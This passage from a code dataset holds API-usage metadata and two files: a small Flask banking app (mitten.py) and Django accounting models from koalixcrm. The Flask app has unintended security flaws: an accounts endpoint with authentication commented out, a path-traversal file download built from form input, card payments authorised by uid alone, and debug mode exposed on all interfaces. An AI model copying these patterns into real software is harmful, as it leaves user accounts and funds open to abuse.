"flask_restplus.fields", "line_number": 28, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 76, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 80, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 80, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 91, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 94, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 94, "usage_type": "attribute"}, 
{"api_name": "ah_datadog.get_datadog_prefix", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 95, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 77, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 75, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 104, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 108, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 108, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 108, "usage_type": "call"}, {"api_name": "time.time", "line_number": 119, "usage_type": "call"}, {"api_name": "modeling.model.max_adjustment.MaxAdjustmentModel.MaxAdjustmentModel", "line_number": 120, "usage_type": "call"}, {"api_name": "modeling.misc.experiment.UserExperiment", "line_number": 125, "usage_type": "call"}, {"api_name": "time.time", "line_number": 128, "usage_type": "call"}, {"api_name": "time.time", "line_number": 138, "usage_type": "call"}, {"api_name": "time.time", "line_number": 139, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, "usage_type": "call"}, {"api_name": "time.time", "line_number": 142, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 146, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 146, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 185, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 189, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 189, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 190, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 105, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 103, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 195, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 199, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 199, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 199, "usage_type": "call"}, {"api_name": "modeling.model.newuser.NewUserRiskModel.NewUserRiskModel", "line_number": 210, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 212, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 218, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 218, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 234, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 238, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 238, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 238, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 239, "usage_type": "call"}, {"api_name": 
"ah_datadog.datadog_timed", "line_number": 196, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 194, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 194, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 246, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 250, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 250, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 250, "usage_type": "call"}, {"api_name": "modeling.model.restore.RestoreModel.RestoreModel", "line_number": 261, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 263, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 269, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 269, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 269, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 292, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 296, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 296, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 296, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 297, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 247, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 245, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 245, "usage_type": "name"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 303, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 300, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 310, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 307, "usage_type": "call"}, {"api_name": "flask.g.extras", "line_number": 316, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.ResourceException", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "510901758", "text": "from flask import Flask, request, Response, jsonify, redirect, render_template, session, send_file\nimport bcrypt\nfrom secrets import token_urlsafe\nimport requests\nfrom time import time\nimport json\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\ndb = client.mitten\nusers = db.users\n\napp = Flask(__name__)\n\nports = {\n 'B1' : 8081,\n 'B2' : 8082,\n 'B3' : 8083,\n}\n\n@app.route('/user', methods = ['POST'])\ndef create_user():\n email = request.form.get('email')\n password = request.form.get('password').encode()\n name = request.form.get('name')\n\n salt = bcrypt.gensalt()\n hashed = bcrypt.hashpw(password, salt)\n token = token_urlsafe(16) \n\n users.insert({\n 'email' : email,\n 'hashed' : hashed,\n 'name' : name,\n 'salt' : salt,\n 'token' : token,\n })\n\n return 'ok'\n\n@app.route('/getuser', methods = ['POST'])\n@app.route('/user', methods = ['GET'])\ndef get_user():\n print(request)\n email = request.form.get('email')\n password = request.form.get('password').encode()\n\n user = users.find_one({'email' : email})\n\n salt = user['salt']\n hashed = bcrypt.hashpw(password, salt)\n\n if user['hashed'] == hashed:\n return jsonify({'token' : user['token'],\n 'name' : user['name'],\n 
}) \n else:\n return '0'\n\n@app.route('/getaccounts', methods = ['POST'])\n@app.route('/accounts', methods = ['GET'])\ndef accounts():\n # email = request.form.get('email')\n # token = request.form.get('token')\n\n user = users.find_one({'name' : 'Luca'})\n\n # if user['token'] == token:\n print(user['accounts'])\n if 'accounts' in user:\n for account in user['accounts']:\n print(account['accountID'])\n r = requests.get('http://34.89.193.58:' + str(ports[account['accountID'][:2]]) + '/balance',\n data = {'accountID' : account['accountID'],\n\n })\n account['balance'] = json.loads(r.content.decode())['balance']\n \n sd = user['accounts'][1:]\n ret = '
<h1>Luca\'s accounts:</h1><h2>Account ' + sd[0]['accountID'] + ': ' + str(sd[0]['balance']) + ' ' + sd[0]['currency'] + '</h2><br>' + \\\n              '<h2>Account ' + sd[1]['accountID'] + ': ' + str(sd[1]['balance']) + ' ' + sd[1]['currency'] + '</h2>
'\n\n return ret\n else:\n return jsonify([])\n # else:\n # return '0'\n\n@app.route('/transaction', methods = ['POST'])\ndef transaction():\n email = request.form.get('email')\n ammount = request.form.get('ammount')\n token = request.form.get('token')\n accountID = request.form.get('accountID')\n accountIDdest = request.form.get('accountIDdest')\n currency = request.form.get('currency')\n ttype = request.form.get('type')\n timestamp = time()\n\n print(email)\n user = users.find_one({'email' : email})\n\n print(user)\n\n if user['token'] == token:\n r = requests.post('http://34.89.193.58:' + str(ports[accountIDdest[:2]]) + '/transaction',\n data = {'accountID' : accountID,\n 'accountIDdest' : accountIDdest,\n 'ammount' : ammount,\n })\n\n print(r.content)\n if r.content.decode() == 'no money':\n return '0'\n\n\n users.update({'email' : email},\n {'$push' : {'transactions' : {\n 'accountID' : accountID,\n 'currency' : currency,\n 'accountIDdest' : accountIDdest,\n 'type' : ttype,\n 'timestamp' : timestamp,\n 'ammount' : -float(ammount),\n }}})\n\n return 'ok'\n else:\n return '0'\n\n@app.route('/account', methods = ['POST'])\ndef account():\n email = request.form.get('email')\n token = request.form.get('token')\n accountID = request.form.get('accountID')\n currency = request.form.get('currency')\n\n user = users.find_one({'email' : email})\n\n if user['token'] == token:\n users.update({'email' : email},\n {'$push' : {'accounts' : {\n 'accountID' : accountID,\n 'currency' : currency,\n }}})\n\n return 'ok'\n else:\n return '0'\n\n@app.route('/card', methods = ['POST'])\ndef card():\n uid = request.form.get('uid')\n ammount = request.form.get('ammount')\n currency = request.form.get('currency')\n accountIDdest = request.form.get('accountIDdest')\n ttype = request.form.get('type')\n\n user = users.find_one({'card' : uid})\n\n print(user)\n\n token = user['token']\n\n print(token)\n\n for account in user['accounts']:\n print(account)\n if account['currency'] == currency:\n r = requests.post('http://34.89.193.58:8080/transaction',\n data = {'accountIDdest' : accountIDdest,\n 'accountID' : account['accountID'],\n 'ammount' : ammount,\n 'email' : user['email'],\n 'token' : token,\n 'type' : ttype,\n 'currency' : currency,\n })\n\n print(r.content.decode())\n if r.content.decode() == '0':\n return 'Transaction failed'\n\n return 'Transaction succesfull'\n return 'Transaction failed'\n\n@app.route('/img', methods = ['GET'])\n@app.route('/getimg', methods = ['POST'])\ndef img():\n return send_file(request.form.get('user') + '.png')\n\nif __name__ == '__main__':\n app.run(port = 8080,\n host = '0.0.0.0',\n debug = True,\n )\n", "sub_path": "mitten.py", "file_name": "mitten.py", "file_ext": "py", "file_size_in_byte": 5980, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 24, 
"usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "bcrypt.gensalt", "line_number": 26, "usage_type": "call"}, {"api_name": "bcrypt.hashpw", "line_number": 27, "usage_type": "call"}, {"api_name": "secrets.token_urlsafe", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "argument"}, {"api_name": "flask.request.form.get", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "bcrypt.hashpw", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 72, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 91, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 92, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 93, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 94, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 94, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 96, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 96, "usage_type": "name"}, {"api_name": "time.time", "line_number": 97, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 105, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, 
"usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 135, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 135, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 152, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 152, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 153, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 153, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 154, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 154, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 155, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 155, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 156, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 156, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 189, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 189, "usage_type": "name"}]} +{"seq_id": "576384937", "text": "# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import *\nfrom subprocess import check_output\nfrom subprocess import STDOUT\nfrom xml.dom.minidom import Document\n\nfrom django.conf import settings\nfrom django.core import serializers\nfrom django.db import models\nfrom django.utils.translation import ugettext as _\nfrom koalixcrm import djangoUserExtension\nfrom koalixcrm.crm.exceptions import UserExtensionMissing\nfrom koalixcrm.accounting.const.accountTypeChoices import *\nfrom koalixcrm.accounting.exceptions import NoObjectsToBeSerialzed\nfrom koalixcrm.accounting.exceptions import ProgrammingError\n\n\nclass AccountingPeriod(models.Model):\n \"\"\"Accounting period repesents the equivalent of the business logic element of a fiscal year\n the accounting period is refered in the booking and is used as a supporting object to generate\n balance sheets and profit/loss statements\"\"\"\n title = models.CharField(max_length=200, verbose_name=_(\"Title\")) # For example \"Year 2009\", \"1st Quarter 2009\"\n begin = models.DateField(verbose_name=_(\"Begin\"))\n end = models.DateField(verbose_name=_(\"End\"))\n\n @staticmethod\n def getCurrentValidAccountingPeriod():\n \"\"\"Returns the accounting period that is currently valid. 
Valid is an accountingPeriod when the current date\n lies between begin and end of the accountingPeriod\n\n Args:\n no arguments\n\n Returns:\n accoutingPeriod (AccoutingPeriod)\n\n Raises:\n NoFeasableAccountingPeriodFound when there is no valid accounting Period\"\"\"\n currentValidAccountingPeriod = None\n for accountingPeriod in AccountingPeriod.objects.all():\n if accountingPeriod.begin < date.today() and accountingPeriod.end > date.today():\n return accountingPeriod\n if currentValidAccountingPeriod == None:\n raise NoFeasableAccountingPeriodFound()\n\n @staticmethod\n def getAllPriorAccountingPeriods(targetAccountingPeriod):\n \"\"\"Returns the accounting period that is currently valid. Valid is an accountingPeriod when the current date\n lies between begin and end of the accountingPeriod\n\n Args:\n no arguments\n\n Returns:\n accoutingPeriods (List of AccoutingPeriod)\n\n Raises:\n NoPriorAccountingPeriodFound when there is no valid accounting Period\"\"\"\n currentValidAccountingPeriod = None\n accountingPeriods = []\n for accountingPeriod in AccountingPeriod.objects.all():\n if accountingPeriod.end < targetAccountingPeriod.begin:\n accountingPeriods.append(accountingPeriod)\n if accountingPeriods == []:\n raise NoPriorAccountingPeriodFound()\n return accountingPeriods\n\n @staticmethod\n def createXML(whatToCreate):\n \"\"\"This method serialize requestd objects into a XML file which is located in the PDF_OUTPUT_ROOT folder.\n\n Args:\n whatToCreate (str): Which objects that have to be serialized\n\n Returns:\n path_full to the location of the file\n\n Raises:\n ProgrammingError will be raised when incorrect objects to be serialized was selected\n NoObjectToBeSerialized will be raised when no object can be serialized\"\"\"\n\n XMLSerializer = serializers.get_serializer(\"xml\")\n xml_serializer = XMLSerializer()\n if whatToCreate == \"allAccount\":\n path_fullToOutputFile = os.path.join(settings.PDF_OUTPUT_ROOT, \"accounts.xml\")\n objectsToSerialize = Account.objects.all()\n else:\n raise ProgrammingError(\n _(\"During XML Export it was not correctly specified which data that has to be exported\"))\n out = open(os.path.join(settings.PDF_OUTPUT_ROOT, \"accounts.xml\"), \"w\")\n if objectsToSerialize == '':\n raise NoObjectsToBeSerialzed(_(\"During XML Export it was not correctly specied data has to be exported\"))\n else:\n xml_serializer.serialize(objectsToSerialize, stream=out, indent=3)\n out.close()\n return path_fullToOutputFile\n\n # TODO def importAllAccountsXML(self):\n\n def createPDF(self, raisedbyuser, whatToCreate):\n userExtension = djangoUserExtension.models.UserExtension.objects.filter(user=raisedbyuser.id)\n if (len(userExtension) == 0):\n raise UserExtensionMissing(_(\"During BalanceSheet PDF Export\"))\n doc = Document()\n if whatToCreate == \"balanceSheet\":\n main = doc.createElement(\"koalixaccountingbalacesheet\")\n out = open(os.path.join(settings.PDF_OUTPUT_ROOT, \"balancesheet_\" + str(self.id) + \".xml\"), \"wb\")\n else:\n main = doc.createElement(\"koalixaccountingprofitlossstatement\")\n out = open(os.path.join(settings.PDF_OUTPUT_ROOT, \"profitlossstatement_\" + str(self.id) + \".xml\"), \"wb\")\n accountingPeriodName = doc.createElement(\"accountingPeriodName\")\n accountingPeriodName.appendChild(doc.createTextNode(self.__str__()))\n main.appendChild(accountingPeriodName)\n organisiationname = doc.createElement(\"organisiationname\")\n organisiationname.appendChild(doc.createTextNode(userExtension[0].defaultTemplateSet.organisationname))\n 
main.appendChild(organisiationname)\n accountingPeriodTo = doc.createElement(\"accountingPeriodTo\")\n accountingPeriodTo.appendChild(doc.createTextNode(self.end.year.__str__()))\n main.appendChild(accountingPeriodTo)\n accountingPeriodFrom = doc.createElement(\"accountingPeriodFrom\")\n accountingPeriodFrom.appendChild(doc.createTextNode(self.begin.year.__str__()))\n main.appendChild(accountingPeriodFrom)\n headerPicture = doc.createElement(\"headerpicture\")\n headerPicture.appendChild(doc.createTextNode(userExtension[0].defaultTemplateSet.logo.path_full))\n main.appendChild(headerPicture)\n accounts = Account.objects.all()\n overallValueBalance = 0\n overallValueProfitLoss = 0\n for account in list(accounts):\n withinAccountingPeriod = account.sumOfAllBookingsWithinAccountingPeriod(self)\n beforeAccountingPeriod = account.sumOfAllBookingsBeforeAccountingPeriod(self)\n currentValue = withinAccountingPeriod + beforeAccountingPeriod\n if (currentValue != 0):\n currentAccountElement = doc.createElement(\"Account\")\n accountNumber = doc.createElement(\"AccountNumber\")\n accountNumber.appendChild(doc.createTextNode(account.accountNumber.__str__()))\n beforeAccountingPeriodAccountElement = doc.createElement(\"beforeAccountingPeriod\")\n beforeAccountingPeriodAccountElement.appendChild(doc.createTextNode(beforeAccountingPeriod.__str__()))\n currentValueElement = doc.createElement(\"currentValue\")\n currentValueElement.appendChild(doc.createTextNode(currentValue.__str__()))\n accountNameElement = doc.createElement(\"accountName\")\n accountNameElement.appendChild(doc.createTextNode(account.title))\n currentAccountElement.setAttribute(\"accountType\", account.accountType.__str__())\n currentAccountElement.appendChild(accountNumber)\n currentAccountElement.appendChild(accountNameElement)\n currentAccountElement.appendChild(currentValueElement)\n currentAccountElement.appendChild(beforeAccountingPeriodAccountElement)\n main.appendChild(currentAccountElement)\n if account.accountType == \"A\":\n overallValueBalance = overallValueBalance + currentValue;\n if account.accountType == \"L\":\n overallValueBalance = overallValueBalance - currentValue;\n if account.accountType == \"E\":\n overallValueProfitLoss = overallValueProfitLoss + currentValue;\n if account.accountType == \"S\":\n overallValueProfitLoss = overallValueProfitLoss - currentValue;\n totalProfitLoss = doc.createElement(\"TotalProfitLoss\")\n totalProfitLoss.appendChild(doc.createTextNode(overallValueProfitLoss.__str__()))\n main.appendChild(totalProfitLoss)\n totalBalance = doc.createElement(\"TotalBalance\")\n totalBalance.appendChild(doc.createTextNode(overallValueBalance.__str__()))\n main.appendChild(totalBalance)\n doc.appendChild(main)\n out.write(doc.toprettyxml(indent=\" \", newl=\"\\n\", encoding=\"utf-8\"))\n out.close()\n if whatToCreate == \"balanceSheet\":\n check_output(\n [settings.FOP_EXECUTABLE, '-c', userExtension[0].defaultTemplateSet.fopConfigurationFile.path_full, '-xml',\n os.path.join(settings.PDF_OUTPUT_ROOT, 'balancesheet_' + str(self.id) + '.xml'), '-xsl',\n userExtension[0].defaultTemplateSet.balancesheetXSLFile.xslfile.path_full, '-pdf',\n os.path.join(settings.PDF_OUTPUT_ROOT, 'balancesheet_' + str(self.id) + '.pdf')], stderr=STDOUT)\n return os.path.join(settings.PDF_OUTPUT_ROOT, \"balancesheet_\" + str(self.id) + \".pdf\")\n else:\n check_output(\n [settings.FOP_EXECUTABLE, '-c', userExtension[0].defaultTemplateSet.fopConfigurationFile.path_full, '-xml',\n os.path.join(settings.PDF_OUTPUT_ROOT, 
'profitlossstatement_' + str(self.id) + '.xml'), '-xsl',\n userExtension[0].defaultTemplateSet.profitLossStatementXSLFile.xslfile.path_full, '-pdf',\n os.path.join(settings.PDF_OUTPUT_ROOT, 'profitlossstatement_' + str(self.id) + '.pdf')], stderr=STDOUT)\n return os.path.join(settings.PDF_OUTPUT_ROOT, \"profitlossstatement_\" + str(self.id) + \".pdf\")\n\n def __str__(self):\n return self.title\n\n # TODO: def createNewAccountingPeriod() Neues Geschäftsjahr erstellen\n\n class Meta:\n app_label = \"accounting\"\n verbose_name = _('Accounting Period')\n verbose_name_plural = _('Accounting Periods')\n\n\nclass Account(models.Model):\n accountNumber = models.IntegerField(verbose_name=_(\"Account Number\"))\n title = models.CharField(verbose_name=_(\"Account Title\"), max_length=50)\n accountType = models.CharField(verbose_name=_(\"Account Type\"), max_length=1, choices=ACCOUNTTYPECHOICES)\n description = models.TextField(verbose_name=_(\"Description\"), null=True, blank=True)\n isopenreliabilitiesaccount = models.BooleanField(verbose_name=_(\"Is The Open Liabilities Account\"))\n isopeninterestaccount = models.BooleanField(verbose_name=_(\"Is The Open Interests Account\"))\n isProductInventoryActiva = models.BooleanField(verbose_name=_(\"Is a Product Inventory Account\"))\n isACustomerPaymentAccount = models.BooleanField(verbose_name=_(\"Is a Customer Payment Account\"))\n\n def sumOfAllBookings(self):\n calculated_sum = self.allBookings(fromAccount=False) - self.allBookings(fromAccount=True)\n if self.accountType == 'S' or self.accountType == 'L':\n calculated_sum = 0 - calculated_sum\n return calculated_sum\n\n sumOfAllBookings.short_description = _(\"Value\");\n\n def sumOfAllBookingsWithinAccountingPeriod(self, accountingPeriod):\n calculated_sum = self.allBookingsInAccountingPeriod(fromAccount=False,\n accountingPeriod=accountingPeriod) - self.allBookingsInAccountingPeriod(\n fromAccount=True, accountingPeriod=accountingPeriod)\n if self.accountType == 'S' or self.accountType == 'L':\n calculated_sum = 0 - calculated_sum\n return calculated_sum\n\n def sumOfAllBookingsBeforeAccountingPeriod(self, currentAccountingPeriod):\n accountingPeriods = AccountingPeriod.getAllPriorAccountingPeriods(currentAccountingPeriod)\n sum = 0\n for accountingPeriod in accountingPeriods:\n sum = sum + self.allBookingsInAccountingPeriod(fromAccount=False,\n accountingPeriod=accountingPeriod) - self.allBookingsInAccountingPeriod(\n fromAccount=True, accountingPeriod=accountingPeriod)\n if self.accountType == 'S' or self.accountType == 'L':\n sum = 0 - sum\n return sum\n\n def allBookings(self, fromAccount):\n sum = 0\n if fromAccount == True:\n bookings = Booking.objects.filter(fromAccount=self.id)\n else:\n bookings = Booking.objects.filter(toAccount=self.id)\n\n for booking in list(bookings):\n sum = sum + booking.amount\n\n return sum\n\n def allBookingsInAccountingPeriod(self, fromAccount, accountingPeriod):\n sum = 0\n if (fromAccount == True):\n bookings = Booking.objects.filter(fromAccount=self.id, accountingPeriod=accountingPeriod.id)\n else:\n bookings = Booking.objects.filter(toAccount=self.id, accountingPeriod=accountingPeriod.id)\n\n for booking in list(bookings):\n sum = sum + booking.amount\n\n return sum\n\n def __str__(self):\n return self.accountNumber.__str__() + \" \" + self.title\n\n class Meta:\n app_label = \"accounting\"\n verbose_name = _('Account')\n verbose_name_plural = _('Account')\n ordering = ['accountNumber']\n\n\nclass ProductCategorie(models.Model):\n title = 
models.CharField(verbose_name=_(\"Product Categorie Title\"), max_length=50)\n profitAccount = models.ForeignKey(Account, verbose_name=_(\"Profit Account\"), limit_choices_to={\"accountType\": \"E\"},\n related_name=\"db_profit_account\")\n lossAccount = models.ForeignKey(Account, verbose_name=_(\"Loss Account\"), limit_choices_to={\"accountType\": \"S\"},\n related_name=\"db_loss_account\")\n\n class Meta:\n app_label = \"accounting\"\n verbose_name = _('Product Categorie')\n verbose_name_plural = _('Product Categories')\n\n def __str__(self):\n return self.title\n\n\nclass Booking(models.Model):\n fromAccount = models.ForeignKey(Account, verbose_name=_(\"From Account\"), related_name=\"db_booking_fromaccount\")\n toAccount = models.ForeignKey(Account, verbose_name=_(\"To Account\"), related_name=\"db_booking_toaccount\")\n amount = models.DecimalField(max_digits=20, decimal_places=2, verbose_name=_(\"Amount\"))\n description = models.CharField(verbose_name=_(\"Description\"), max_length=120, null=True, blank=True)\n bookingReference = models.ForeignKey('crm.Invoice', verbose_name=_(\"Booking Reference\"), null=True, blank=True)\n bookingDate = models.DateTimeField(verbose_name=_(\"Booking at\"))\n accountingPeriod = models.ForeignKey(AccountingPeriod, verbose_name=_(\"AccountingPeriod\"))\n staff = models.ForeignKey('auth.User', limit_choices_to={'is_staff': True}, blank=True,\n verbose_name=_(\"Reference Staff\"), related_name=\"db_booking_refstaff\")\n dateofcreation = models.DateTimeField(verbose_name=_(\"Created at\"), auto_now=True)\n lastmodification = models.DateTimeField(verbose_name=_(\"Last modified\"), auto_now_add=True)\n lastmodifiedby = models.ForeignKey('auth.User', limit_choices_to={'is_staff': True}, blank=True,\n verbose_name=_(\"Last modified by\"), related_name=\"db_booking_lstmodified\")\n\n def bookingDateOnly(self):\n return self.bookingDate.date()\n\n bookingDateOnly.short_description = _(\"Date\");\n\n def __str__(self):\n return self.fromAccount.__str__() + \" \" + self.toAccount.__str__() + \" \" + self.amount.__str__()\n\n class Meta:\n app_label = \"accounting\"\n verbose_name = _('Booking')\n verbose_name_plural = _('Bookings')\n", "sub_path": "koalixcrm/accounting/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 15735, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.db.models.Model", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models.DateField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models.DateField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 26, "usage_type": "call"}, {"api_name": "django.core.serializers.get_serializer", "line_number": 